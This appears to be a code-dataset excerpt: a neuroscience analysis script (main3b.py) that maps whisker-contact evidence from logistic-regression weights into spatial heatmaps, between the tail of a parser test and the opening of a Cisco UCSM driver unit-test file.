            assert parser.options.options['debug']
        finally:
            lark_module.FS = fs
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    main()
| 25.578431
| 74
| 0.549636
|
4a07d900ad7b599f70e637c4d796bad04485147c
| 23,786
|
py
|
Python
|
04_logreg_vis/main3b.py
|
cxrodgers/Rodgers2021
|
cbcc166f9c06b18022cec91a289a1e84ece791ae
|
[
"MIT"
] | null | null | null |
04_logreg_vis/main3b.py
|
cxrodgers/Rodgers2021
|
cbcc166f9c06b18022cec91a289a1e84ece791ae
|
[
"MIT"
] | null | null | null |
04_logreg_vis/main3b.py
|
cxrodgers/Rodgers2021
|
cbcc166f9c06b18022cec91a289a1e84ece791ae
|
[
"MIT"
] | null | null | null |
## Heatmap the contacts and anti-contacts in the warped plot by their evidence
# Uses data:
# big_weights_part
# reduced_model_results_sbrc/no_opto/contact_binarized+anti_contact_count+angle+anti_angle_max
"""
4A, bottom; S4A, bottom
PLOT_EDGE_SUMMARY_ONLY
Image of the different shape positions in the consensus space
4B
PLOT_OCCUPANCY_DISCONLY
Locations of whisks with contact and whisks without contact
4C; S4B
PLOT_EVIDENCE_DISCONLY_REWSIDEONLY
Evidence for stimulus in both whisks with and without contact
S4C
PLOT_EVIDENCE_DISCONLY_CHOICEONLY
Evidence for choice in both whisks with and without contact
"""
import json
import os
import pandas
import numpy as np
import my.plot
import matplotlib.pyplot as plt
import matplotlib
import extras
## Plot flags
# Apply manuscript-wide matplotlib defaults and embed fonts in vector output.
my.plot.manuscript_defaults()
my.plot.font_embed()

## Parameters
# Project-wide parameter file; keys like 'patterns_dir', 'scaling_dir',
# 'logreg_dir' point at data directories (see uses below).
with open('../parameters') as fi:
    params = json.load(fi)

## Load metadata about sessions
session_df, task2mouse, mouse2task = my.dataload.load_session_metadata(params)
big_tm = pandas.read_pickle(os.path.join(params['patterns_dir'], 'big_tm'))

# Insert mouse and task levels into big_tm
big_tm = my.misc.insert_mouse_and_task_levels(
    big_tm, mouse2task, level=0, sort=True)

# Count the number of trials per session
n_trials_per_session = big_tm.groupby(['task', 'mouse', 'session']).size()

# Count the number of trials per mouse
n_trials_per_mouse = n_trials_per_session.sum(level=['task', 'mouse'])

## Load warping data
transformation_df = pandas.read_pickle(
    os.path.join(params['scaling_dir'], 'transformation_df'))
consensus_edge_summary = pandas.read_pickle(
    os.path.join(params['scaling_dir'], 'consensus_edge_summary'))

# ces to plot
# NOTE(review): stepper_pos 50 / 150 presumably select the two stimulus
# positions (convex vs concave) -- confirm against the scaling pipeline.
cv_ces = consensus_edge_summary.xs(50, level='stepper_pos').max(level='row')
cc_ces = consensus_edge_summary.xs(150, level='stepper_pos').max(level='row')
all_ces = consensus_edge_summary.max(level='row')

# fillna for transparent plotting
cv_ces[cv_ces == 0] = np.nan
cc_ces[cc_ces == 0] = np.nan
all_ces[all_ces == 0] = np.nan

## Load data
C2_whisk_cycles = pandas.read_pickle(
    os.path.join(params['patterns_dir'], 'big_C2_tip_whisk_cycles'))
big_cycle_features = pandas.read_pickle(
    os.path.join(params['patterns_dir'], 'big_cycle_features'))

# This is just to plot follicle position
mean_follicle = pandas.read_pickle(
    os.path.join(params['patterns_dir'], 'mean_follicle'))

# Transform follicle
transformed_mean_follicle = my.misc.transform(
    mean_follicle, transformation_df).mean(level='whisker')

## Load the original features for plotting
# Need the original bins ('analysis_bin') to interpret the weights
ouf = pandas.read_pickle(os.path.join(params['logreg_dir'],
    'obliviated_unaggregated_features_with_bin'))

# Insert mouse and task levels into features
ouf = my.misc.insert_mouse_and_task_levels(
    ouf, mouse2task, level=0, sort=True)

# Add a new bin for this analysis: 4 equal bins of peak frame wrt rwin
bin_edges_frames = np.linspace(-300, 100, 5)
bin_centers_frames = (bin_edges_frames[1:] + bin_edges_frames[:-1]) / 2.0
bin_ser = pandas.cut(
    C2_whisk_cycles['peak_frame_wrt_rwin'],
    bin_edges_frames, labels=False, right=True).rename('bin')

# Append bin_ser to index
idxdf = ouf.index.to_frame().reset_index(drop=True)
idxdf = idxdf.join(bin_ser, on=['session', 'trial', 'cycle'])
# Whisks outside the bin edges get bin -1 and are dropped just below.
# Fix: `np.int` was an alias of builtin `int`, deprecated in NumPy 1.20
# and removed in 1.24; use the builtin directly (identical behavior).
idxdf['bin'] = idxdf['bin'].fillna(-1).astype(int)
ouf.index = pandas.MultiIndex.from_frame(idxdf)

# Drop null bins and reorder levels
ouf = ouf.drop(-1, level='bin')
ouf = ouf.reorder_levels(
    ['task', 'mouse', 'session', 'trial', 'bin', 'analysis_bin', 'cycle']
    ).sort_index()

# Extract features of interest
contact_binarized = ouf['contact_binarized']
anti_contact_count = ouf['anti_contact_count']
## Load results of main2a1
# Logistic-regression weights fit elsewhere; indexed down to per-feature
# weights per decode_label ('rewside' / 'choice').
big_weights_part = pandas.read_pickle('big_weights_part')
# Choose the reduced_model
reduced_model = 'contact_binarized+anti_contact_count+angle+anti_angle_max'
# Use these weights
# NOTE(review): the leading [False] key presumably selects the non-opto
# partition -- confirm against main2a1's output format.
use_weights = big_weights_part[False]['no_opto'][reduced_model]
# normalizing stuff for features that aren't raw
normalizing_mu = pandas.read_pickle(os.path.join(
    params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model,
    'big_normalizing_mu'))
normalizing_sigma = pandas.read_pickle(os.path.join(
    params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model,
    'big_normalizing_sigma'))
# Remove redundant
# mu/sigma are identical across decode labels, so keep only 'rewside'.
normalizing_mu = normalizing_mu.xs(
    'rewside', level='decode_label').rename('mu').copy()
normalizing_sigma = normalizing_sigma.xs(
    'rewside', level='decode_label').rename('sigma').copy()
## Extract the locations of each contact, to be weighted by weights
# Extract contact presence and angle onto the columns, one row per contact
stacked_contacts = ouf[
    ['anti_angle_max', 'anti_contact_count', 'contact_binarized', 'angle']
    ].stack('label')
# Drop the rows that have neither anti- nor actual contact
stacked_contacts = stacked_contacts.loc[
    (stacked_contacts['anti_contact_count'] != 0) |
    (stacked_contacts['contact_binarized'] != 0)
    ].copy()
# Join on whisk location (this is where it will be plotted)
# TODO: join on contact location, not peak location, but probably the same
to_join = big_cycle_features[
    ['peak_tip_x', 'peak_tip_y']].stack('whisker')
to_join.index = to_join.index.rename('label', level='whisker')
stacked_contacts = stacked_contacts.join(
    to_join, on=['session', 'trial', 'cycle', 'label']).sort_index()
assert not stacked_contacts.index.duplicated().any()
## Apply the standardization to the non-raw features
# Only standardize these (the count features were fit on raw values)
standardized_features = ['anti_angle_max', 'angle']
# Extract and join on sigma and mu
to_standardize = stacked_contacts[
    standardized_features].stack().rename('value').to_frame()
to_standardize = to_standardize.join(
    normalizing_mu,
    on=['session', 'metric', 'label', 'analysis_bin']
    )
to_standardize = to_standardize.join(
    normalizing_sigma,
    on=['session', 'metric', 'label', 'analysis_bin']
    )
# z-score: (value - mu) / sigma, matching the fit-time normalization
to_standardize['standardized'] = to_standardize['value'].sub(
    to_standardize['mu']).divide(to_standardize['sigma'])
# Drop ones that go to infinity (sigma == 0), nulls, and extreme outliers
to_standardize = to_standardize.loc[
    ~np.isinf(to_standardize['standardized']) &
    ~to_standardize['standardized'].isnull() &
    (to_standardize['standardized'].abs() < 10)
    ]
# Put back into stacked_contacts
# This will insert nulls where standardized angle was messed up
to_rejoin = to_standardize['standardized'].unstack('metric')
stacked_contacts = stacked_contacts.drop(standardized_features, axis=1)
stacked_contacts = stacked_contacts.join(to_rejoin)
## Transform contact location into the warped space
to_transform = stacked_contacts[['peak_tip_x', 'peak_tip_y']]
transformed_contacts = my.misc.transform(
    to_transform, transformation_df).rename(
    columns={'peak_tip_x': 'transformed_x', 'peak_tip_y': 'transformed_y'})
## Calculate the evidence of each contact
# evidence = feature value * fitted weight, summed over metrics per whisk.
# Stack contacts again, so that each metric (e.g. angle) is a row
to_weight = stacked_contacts[
    ['anti_contact_count', 'contact_binarized', 'angle', 'anti_angle_max']
    ].stack().rename('value')

# Get decode_label alone on columns
flattened_weights = use_weights.stack().stack().stack().unstack('decode_label')

# Rename weights
flattened_weights = flattened_weights.rename(
    columns={'choice': 'choice_weight', 'rewside': 'rewside_weight'})

# Join the weights onto the contacts
joined = to_weight.to_frame().join(
    flattened_weights, on=flattened_weights.index.names)
#~ assert not joined.isnull().any().any()
assert len(joined) == len(to_weight)

# Shouldn't be any nulls because they would have been dropped by stacking
#~ assert not joined.isnull().any().any()

# Apply weight
joined['choice_evidence'] = joined['value'] * joined['choice_weight']
joined['rewside_evidence'] = joined['value'] * joined['rewside_weight']
evidence = joined[['choice_evidence', 'rewside_evidence']].copy()

# Sum over metric
evidence = evidence.sum(
    level=[lev for lev in evidence.index.names if lev != 'metric']
    )

## Concat data about contacts, their transformed position, and their evidence
contact_evidence = pandas.concat(
    [stacked_contacts, transformed_contacts, evidence],
    axis=1, sort=True, verify_integrity=True).sort_index(axis=1)

## Bin the contacts spatially
# How to bin: 25 x 25 grid over the warped frame
bins_x = np.linspace(-300, 300, 26)
bincenters_x = (bins_x[1:] + bins_x[:-1]) / 2.0
bins_y = np.linspace(-200, 400, 26)
bincenters_y = (bins_y[1:] + bins_y[:-1]) / 2.0

# Histogram the points
contact_evidence['bin_x'] = pandas.cut(
    contact_evidence['transformed_x'],
    bins=bins_x,
    labels=False, right=True)
contact_evidence['bin_y'] = pandas.cut(
    contact_evidence['transformed_y'],
    bins=bins_y,
    labels=False, right=True)

# Drop ones outside bins
# TODO: check this doesn't happen too much
contact_evidence = contact_evidence.dropna(subset=['bin_x', 'bin_y'])
# Fix: `np.int` was an alias of builtin `int`, deprecated in NumPy 1.20
# and removed in 1.24; use the builtin directly (identical behavior).
contact_evidence['bin_x'] = contact_evidence['bin_x'].astype(int)
contact_evidence['bin_y'] = contact_evidence['bin_y'].astype(int)

# This is used to reindex various quantities below to evenly tile the frame
full_spatial_bincenter_midx = pandas.MultiIndex.from_product([
    pandas.Index(range(len(bincenters_x)), name='bin_x'),
    pandas.Index(range(len(bincenters_y)), name='bin_y'),
    ], names=['bin_x', 'bin_y'])

## Rename label to whisker
contact_evidence.index = contact_evidence.index.rename('whisker', level='label')

## Drop C0 for now
contact_evidence = contact_evidence.drop('C0', level='whisker')

## Split the evidence by contact vs no-contact whisks
# A contact occurred
yes_contact_evidence = contact_evidence.loc[
    (contact_evidence['contact_binarized'] > 0) &
    (contact_evidence['anti_contact_count'] == 0)
    ]

# No contact occurred
non_contact_evidence = contact_evidence.loc[
    (contact_evidence['contact_binarized'] == 0) &
    (contact_evidence['anti_contact_count'] > 0)
    ]

# On ~1.5% of whisks some double pump happened where both a contact
# and an anti-contact happened on the same whisker
# Those are dropped (they match neither mask above)
# Add this as a level
contact_evidence = pandas.concat([
    yes_contact_evidence, non_contact_evidence],
    axis=0, sort=True, verify_integrity=True, keys=['yes', 'non'],
    names=['contact_typ'])

## Aggregate the evidence by spatial bins
# Mean evidence
gobj = contact_evidence.groupby(
    ['contact_typ', 'task', 'mouse', 'whisker', 'bin_x', 'bin_y'])
aggregated_evidence_spatial = gobj[
    ['choice_evidence', 'rewside_evidence']].mean()

# Count the number of whisks that went into this mean
n_whisks = gobj.size().rename('n_whisks')
assert n_whisks.sum() == len(contact_evidence)
aggregated_evidence_spatial = aggregated_evidence_spatial.join(n_whisks)

# Calculate whisks per trial in each bin
# This is more appropriate for comparing across conditions
aggregated_evidence_spatial['n_whisks_per_trial'] = (
    aggregated_evidence_spatial['n_whisks'].divide(
    n_trials_per_mouse)).reorder_levels(
    aggregated_evidence_spatial.index.names)

# Also normalize this, so that it sums to 1 over all spatial bins
# This is more appropriate for just looking at relative spatial distributions
normalizing_factor = aggregated_evidence_spatial['n_whisks'].sum(
    level=[lev for lev in aggregated_evidence_spatial.index.names
    if lev not in ['bin_x', 'bin_y']])
aggregated_evidence_spatial['norm_whisks_per_trial'] = (
    aggregated_evidence_spatial['n_whisks'].divide(
    normalizing_factor).reorder_levels(
    aggregated_evidence_spatial.index.names)
    )

## Aggregate the evidence by spatiotemporal bins
## TODO: normalize like above
# Mean evidence
gobj = contact_evidence.groupby(
    ['contact_typ', 'task', 'mouse', 'bin', 'whisker', 'bin_x', 'bin_y'])
aggregated_evidence_spatiotemporal = gobj[
    ['choice_evidence', 'rewside_evidence']].mean()

# Sum occupancy
occupancy = gobj.size().rename('n_contacts')
assert occupancy.sum() == len(contact_evidence)
aggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.join(occupancy)

# Normalize the occupancy to sum to 1 over the spatial bins
contacts_per_bin = aggregated_evidence_spatiotemporal['n_contacts'].sum(
    level=[lev for lev in aggregated_evidence_spatiotemporal.index.names
    if lev not in ['bin_x', 'bin_y']])
aggregated_evidence_spatiotemporal['occupancy'] = aggregated_evidence_spatiotemporal['n_contacts'].divide(
    contacts_per_bin).reorder_levels(aggregated_evidence_spatiotemporal.index.names)

# Replace bin with bincenter
idxdf = aggregated_evidence_spatiotemporal.index.to_frame().reset_index(drop=True)
idxdf['frame_bin'] = idxdf['bin'].map(
    pandas.Series(bin_centers_frames, index=range(len(bin_centers_frames))))
aggregated_evidence_spatiotemporal.index = pandas.MultiIndex.from_frame(
    idxdf[['contact_typ', 'task', 'mouse', 'frame_bin',
    'whisker', 'bin_x', 'bin_y']])
aggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.sort_index()
## Plot flags
# Each flag toggles one figure panel (see module docstring for which
# manuscript figure each corresponds to).
PLOT_EDGE_SUMMARY_ONLY = True
PLOT_OCCUPANCY_DISCONLY = True
PLOT_EVIDENCE_DISCONLY_REWSIDEONLY = True
PLOT_EVIDENCE_DISCONLY_CHOICEONLY = True
## Plot
if PLOT_EDGE_SUMMARY_ONLY:
    ## Simple single axis with edge summary, for demonstration
    # Figure handle
    f, ax = plt.subplots(figsize=(3, 2.5))
    f.subplots_adjust(left=0, right=1, bottom=0, top=1)
    # Plot edge summary (convex vs concave shape positions, colored)
    extras.plot_warped_edge_summary(
        ax, cv_ces=cv_ces, cc_ces=cc_ces, typ='color_by_stimulus')
    # Follicle: mark the mean follicle position with a black 'x'
    ax.plot(
        [transformed_mean_follicle['x'].values.mean()],
        [transformed_mean_follicle['y'].values.mean()],
        marker='x', color='k', ls='none')
    # Pretty: equal aspect, fixed frame, y inverted (image convention)
    ax.axis('image')
    ax.set_xlim((-300, 300))
    ax.set_ylim((300, -200))
    ax.set_xticks([])
    ax.set_yticks([])
    # Scale bar
    # 2.7mm = 60px, so 45um per px, or 222.2px per 10mm
    ax.plot([-200, -200+111.1], [275, 275], 'k-', lw=.8)
    ax.text(-200 + 55.55, 275, '5 mm', ha='center', va='bottom', size=12)
    # Save
    f.savefig('PLOT_EDGE_SUMMARY_ONLY.svg')
    f.savefig('PLOT_EDGE_SUMMARY_ONLY.png', dpi=300)
if PLOT_OCCUPANCY_DISCONLY:
    # Figure 4B: spatial occupancy of whisks with vs without contact,
    # overlaid on the grayscale consensus edge summary.
    ## Parameters
    # Metric to plot
    metric_topl = 'norm_whisks_per_trial'
    # Iterate over whisk type (rows of figure)
    whisk_typ_l = ['yes', 'non']
    # Do only discrimination
    task = 'discrimination'
    # Binning
    mouse_thresh = 4
    nwpt_thresh = .02
    # Plotting
    edge_alpha = .3
    occupancy_vmin = 0
    occupancy_vmax = .03
    ## Aggregrate
    # Slice by task and group by whisk type
    figure_gobj = aggregated_evidence_spatial.xs(
        task, level='task').groupby(
        'contact_typ')
    ## Make handles
    f, axa = plt.subplots(
        len(whisk_typ_l), 1,
        figsize=(3, 6.5), sharex=True, sharey=True)
    f.subplots_adjust(left=0, right=1, bottom=0, top=.925, hspace=.3)
    ## Iterate over whisk types (rows)
    for whisk_typ, sub_ae in figure_gobj:
        ## Slice
        # Droplevel
        sub_ae = sub_ae.droplevel('contact_typ')
        # Slice data (evidence)
        axis_data = sub_ae[metric_topl]
        # Get ax: row order follows whisk_typ_l, not groupby order
        ax = axa[
            whisk_typ_l.index(whisk_typ)
            ]
        # Set title
        if whisk_typ == 'yes':
            ax.set_title('whisks with contact\n(location)')
        elif whisk_typ == 'non':
            ax.set_title('whisks without contact\n(location)')
        ## Spatialize occupancy
        # Mean over mice, separately by whisker
        spatialized = axis_data.mean(
            level=['whisker', 'bin_x', 'bin_y'])
        # Combine to rgb (one color channel per whisker)
        occupancy_rgb = extras.combine_whisker_occupancy_to_rgb(
            spatialized, full_spatial_bincenter_midx,
            bins_x, bins_y,
            x_index=all_ces.columns, y_index=all_ces.index,
            vmin=occupancy_vmin, vmax=occupancy_vmax)
        ## Calculate edge_data
        edge_data = all_ces.values
        # Mask the edge_data, so that it has no effect where it is null
        # Actually, this just avoids warnings about null in normalizing
        masked_edge_data = np.ma.masked_array(
            edge_data, np.isnan(edge_data))
        # Normalize edge data to (0, 1) and colormap in black and white
        # This replaces masked data with the colormap's "bad value"
        edge_norm = matplotlib.colors.Normalize(vmin=0, vmax=1)
        edge_data_rgba = plt.cm.gray_r(edge_norm(masked_edge_data))
        ## Blend occupancy_data and edge_data
        blended_rgba = my.plot.alpha_blend_with_mask(
            edge_data_rgba,
            occupancy_rgb,
            edge_alpha,
            masked_edge_data.mask,
            )
        ## Plot
        im = my.plot.imshow(
            blended_rgba, ax=ax,
            x=all_ces.columns.values, y=all_ces.index.values)
        ## Pretty
        # Plot follicle and ellipses
        extras.plot_follicle_and_ellipses(
            ax, transformed_mean_follicle, label_ellipses=True)
        # Limits
        extras.consistent_limits(ax)
    f.savefig('PLOT_OCCUPANCY_DISCONLY.svg')
    f.savefig('PLOT_OCCUPANCY_DISCONLY.png', dpi=300)
if PLOT_EVIDENCE_DISCONLY_REWSIDEONLY:
    # Figure 4C / S4B: mean per-bin stimulus ('rewside') evidence for
    # whisks with and without contact, blended over the edge summary.
    ## Parameters
    # Metric to plot
    metric_topl = 'rewside_evidence'
    # Iterate over whisk type (rows of figure)
    whisk_typ_l = ['yes', 'non']
    # Do only discrimination
    task = 'discrimination'
    # Binning: only plot bins supported by enough mice and whisks/trial
    mouse_thresh = 4
    nwpt_thresh = .02
    # Plotting
    edge_alpha = .3
    evidence_vmin = -1
    evidence_vmax = 1
    ## Aggregrate
    # Slice by task and group by whisk type
    figure_gobj = aggregated_evidence_spatial.xs(
        task, level='task').groupby(
        'contact_typ')
    ## Make handles
    f, axa = plt.subplots(
        len(whisk_typ_l), 1,
        figsize=(4.25, 6.5), sharex=True, sharey=True)
    f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)
    # Axis for colorbar
    cb_ax = f.add_axes((.77, .27, .03, .4))
    cb = f.colorbar(
        matplotlib.cm.ScalarMappable(
        matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),
        cmap=plt.cm.RdBu_r), cax=cb_ax)
    cb.set_ticks((evidence_vmin, 0, evidence_vmax))
    cb.ax.tick_params(labelsize=12)
    ## Iterate over whisk types (rows)
    for whisk_typ, sub_ae in figure_gobj:
        ## Slice
        # Droplevel
        sub_ae = sub_ae.droplevel('contact_typ')
        # Slice data (evidence)
        axis_data = sub_ae[metric_topl]
        # Get ax: row order follows whisk_typ_l, not groupby order
        ax = axa[
            whisk_typ_l.index(whisk_typ)
            ]
        # Set title
        if whisk_typ == 'yes':
            ax.set_title('whisks with contact\n(evidence)')
        elif whisk_typ == 'non':
            ax.set_title('whisks without contact\n(evidence)')
        ## Identify spatial bins with enough whisks to be worth plotting
        keep_mask = extras.threshold_bins_by_n_whisks(
            sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)
        ## Spatialize evidence
        evidence_data = extras.spatialize_evidence(
            axis_data, keep_mask, full_spatial_bincenter_midx,
            bins_x, bins_y,
            x_index=all_ces.columns, y_index=all_ces.index,
            )
        # Use only raw data
        evidence_data = evidence_data.values
        ## Calculate edge_data
        edge_data = all_ces.values
        # Mask the edge_data, so that it has no effect where it is null
        # Actually, this just avoids warnings about null in normalizing
        masked_edge_data = np.ma.masked_array(
            edge_data, np.isnan(edge_data))
        ## Normalize and blend plot
        extras.normalize_and_blend_plot(
            masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,
            evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,
            x_index=all_ces.columns.values, y_index=all_ces.index.values,
            )
        ## Pretty
        # Plot follicle and ellipses
        extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)
        # Limits
        extras.consistent_limits(ax)
    ## Save
    f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.svg')
    f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.png', dpi=300)
if PLOT_EVIDENCE_DISCONLY_CHOICEONLY:
    # Figure S4C: identical layout to the rewside panel above, but
    # plotting 'choice' evidence with a tighter color scale (+/-.5).
    ## Parameters
    # Metric to plot
    metric_topl = 'choice_evidence'
    # Iterate over whisk type (rows of figure)
    whisk_typ_l = ['yes', 'non']
    # Do only discrimination
    task = 'discrimination'
    # Binning: only plot bins supported by enough mice and whisks/trial
    mouse_thresh = 4
    nwpt_thresh = .02
    # Plotting
    edge_alpha = .3
    evidence_vmin = -.5
    evidence_vmax = .5
    ## Aggregrate
    # Slice by task and group by whisk type
    figure_gobj = aggregated_evidence_spatial.xs(
        task, level='task').groupby(
        'contact_typ')
    ## Make handles
    f, axa = plt.subplots(
        len(whisk_typ_l), 1,
        figsize=(4.25, 6.5), sharex=True, sharey=True)
    f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)
    # Axis for colorbar
    cb_ax = f.add_axes((.77, .27, .03, .4))
    cb = f.colorbar(
        matplotlib.cm.ScalarMappable(
        matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),
        cmap=plt.cm.RdBu_r), cax=cb_ax)
    cb.set_ticks((evidence_vmin, 0, evidence_vmax))
    cb.ax.tick_params(labelsize=12)
    ## Iterate over whisk types (rows)
    for whisk_typ, sub_ae in figure_gobj:
        ## Slice
        # Droplevel
        sub_ae = sub_ae.droplevel('contact_typ')
        # Slice data (evidence)
        axis_data = sub_ae[metric_topl]
        # Get ax: row order follows whisk_typ_l, not groupby order
        ax = axa[
            whisk_typ_l.index(whisk_typ)
            ]
        # Set title
        if whisk_typ == 'yes':
            ax.set_title('whisks with contact\n(evidence)')
        elif whisk_typ == 'non':
            ax.set_title('whisks without contact\n(evidence)')
        ## Identify spatial bins with enough whisks to be worth plotting
        keep_mask = extras.threshold_bins_by_n_whisks(
            sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)
        ## Spatialize evidence
        evidence_data = extras.spatialize_evidence(
            axis_data, keep_mask, full_spatial_bincenter_midx,
            bins_x, bins_y,
            x_index=all_ces.columns, y_index=all_ces.index,
            )
        # Use only raw data
        evidence_data = evidence_data.values
        ## Calculate edge_data
        edge_data = all_ces.values
        # Mask the edge_data, so that it has no effect where it is null
        # Actually, this just avoids warnings about null in normalizing
        masked_edge_data = np.ma.masked_array(
            edge_data, np.isnan(edge_data))
        ## Normalize and blend plot
        extras.normalize_and_blend_plot(
            masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,
            evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,
            x_index=all_ces.columns.values, y_index=all_ces.index.values,
            )
        ## Pretty
        # Plot follicle and ellipses
        extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)
        # Limits
        extras.consistent_limits(ax)
    ## Save
    f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.svg')
    f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.png', dpi=300)
plt.show()
| 31.338603
| 106
| 0.68616
|
4a07d9cf9dc8c2e7f0d63fb5fbeb352e3eda6e73
| 50,208
|
py
|
Python
|
networking_cisco/tests/unit/ml2/drivers/cisco/ucsm/test_cisco_ucsm_driver.py
|
Tehsmash/networking-cisco
|
fdbd79a832fe090f3c4c7bd7a4f0ec0c349d4d16
|
[
"Apache-2.0"
] | null | null | null |
networking_cisco/tests/unit/ml2/drivers/cisco/ucsm/test_cisco_ucsm_driver.py
|
Tehsmash/networking-cisco
|
fdbd79a832fe090f3c4c7bd7a4f0ec0c349d4d16
|
[
"Apache-2.0"
] | null | null | null |
networking_cisco/tests/unit/ml2/drivers/cisco/ucsm/test_cisco_ucsm_driver.py
|
Tehsmash/networking-cisco
|
fdbd79a832fe090f3c4c7bd7a4f0ec0c349d4d16
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from neutron.tests.unit import testlib_api
from networking_cisco.backwards_compatibility import ml2_api as api
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import (
mech_cisco_ucsm as md)
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import config as conf
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import constants as const
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import exceptions
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import ucsm_db
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import ucsm_network_driver
from networking_cisco.tests.unit.ml2.drivers.cisco.ucsm import (
test_cisco_ucsm_common as mocked)
# Module-level fixtures shared by all test cases below.
UCSM_IP_ADDRESS_1 = '1.1.1.1'
UCSM_IP_ADDRESS_2 = '2.2.2.2'
# VNIC types exercised by the tests; only direct/macvtap are SR-IOV capable.
VNIC_NORMAL = 'normal'
VNIC_DIRECT = 'direct'
VNIC_MACVTAP = 'macvtap'
VNIC_TYPES = [VNIC_NORMAL, VNIC_DIRECT, VNIC_MACVTAP]
SRIOV_VNIC_TYPES = [VNIC_DIRECT, VNIC_MACVTAP]
# vendor_id:product_id pairs the mock driver treats as supported.
SUPPORTED_PCI_DEVS = ["1137:0071", "8086:10c9"]
NETWORK_ID_1 = 1001
NETWORK_NAME = 'test-network'
VLAN_ID_1 = 100
VLAN_ID_2 = 101
PORT_STATE_ACTIVE = bc.constants.PORT_STATUS_ACTIVE
NETWORK_TYPE = 'vlan'
NETWORK_ID = 'test-network'
PORT_NAME = 'port1'
PORT_NAME2 = 'port2'
PORT_ID = '100001'
PORT_ID2 = '100002'
HOST1 = 'Hostname1'
HOST2 = 'Hostname2'
# Deliberately malformed PCI vendor strings for negative tests.
PCI_INFO_BAD_NIC = '1111:2222'
PCI_INFO_INVALID = '1111'
UCSM_DRIVER = ('neutron.plugins.ml2.drivers.cisco.ucsm.'
               'ucsm_network_driver.CiscoUcsmDriver')
# Canned ML2 segment dictionaries: one valid VLAN, one unsupported VXLAN,
# one with a physnet the driver does not manage, and a good segment list.
VLAN_SEGMENT = {api.ID: 'vlan_segment_id',
                api.NETWORK_TYPE: 'vlan',
                api.PHYSICAL_NETWORK: 'test_physnet',
                api.SEGMENTATION_ID: VLAN_ID_1}
VXLAN_SEGMENT = {api.ID: 'vlan_segment_id',
                 api.NETWORK_TYPE: 'vxlan',
                 api.PHYSICAL_NETWORK: 'test_physnet',
                 api.SEGMENTATION_ID: VLAN_ID_1}
VLAN_SEGMENTS_BAD = {api.ID: 'vlan_segment_id',
                     api.NETWORK_TYPE: 'vlan',
                     api.PHYSICAL_NETWORK: 'fake_physnet',
                     api.SEGMENTATION_ID: VLAN_ID_2}
VLAN_SEGMENTS_GOOD = [{api.ID: 'vlan_segment_id',
                       api.NETWORK_TYPE: 'vlan',
                       api.PHYSICAL_NETWORK: 'test_physnet',
                       api.SEGMENTATION_ID: VLAN_ID_2}]
# Host -> managing-UCSM-IP mapping used by the mocked driver init.
UCSM_HOST_DICT = {HOST1: UCSM_IP_ADDRESS_1,
                  HOST2: UCSM_IP_ADDRESS_2}
PORT_PROFILE_1 = 'OS-PP-100'
class FakeNetworkContext(api.NetworkContext):
    """Minimal stand-in for an ML2 NetworkContext used by these tests."""

    def __init__(self, segments):
        # Keep the caller-supplied segment list; exposed unchanged below.
        self._network_segments = segments

    @property
    def current(self):
        # The tests only ever consult the network id and name.
        return dict(id=NETWORK_ID_1, name=NETWORK_NAME)

    @property
    def original(self):
        # No prior network state in these tests.
        return None

    @property
    def network_segments(self):
        return self._network_segments
class FakePortContext(object):
    """Port context for testing purposes only."""
    def __init__(self, name, port_id, vnic_type, profile,
                 network_context):
        # Minimal port dict with the keys the mechanism driver inspects.
        self._port = {
            'status': None,
            'id': port_id,
            'name': name,
            # set for _is_supported_deviceowner() to return True
            'device_owner': bc.constants.DEVICE_OWNER_DHCP,
            bc.portbindings.HOST_ID: HOST1,
            bc.portbindings.VNIC_TYPE: vnic_type,
            bc.portbindings.PROFILE: profile
        }
        self._network = network_context
        # Bind against the first segment of the supplied network context.
        self._segment = network_context.network_segments[0]
        self.session = bc.get_writer_session()
    @property
    def current(self):
        # Note: returns the live dict; tests mutate it in place.
        return self._port
    @property
    def original(self):
        return None
    @property
    def network(self):
        return self._network
    @property
    def segment(self):
        return self._segment
    @property
    def bottom_bound_segment(self):
        return self._segment
    def set_binding(self, segment_id, vif_type, vif_details,
                    status=None):
        # Record the binding arguments so tests can assert on them.
        self._bound_segment_id = segment_id
        self._bound_vif_type = vif_type
        self._bound_vif_details = vif_details
        self._port['status'] = status
class FakeServiceProfile(object):
    """Fake UCSM service-profile managed object for testing only.

    Carries dn/pn_dn/template-name attributes and acts as an iterator
    that always yields itself (callers stop iterating on their own).
    """

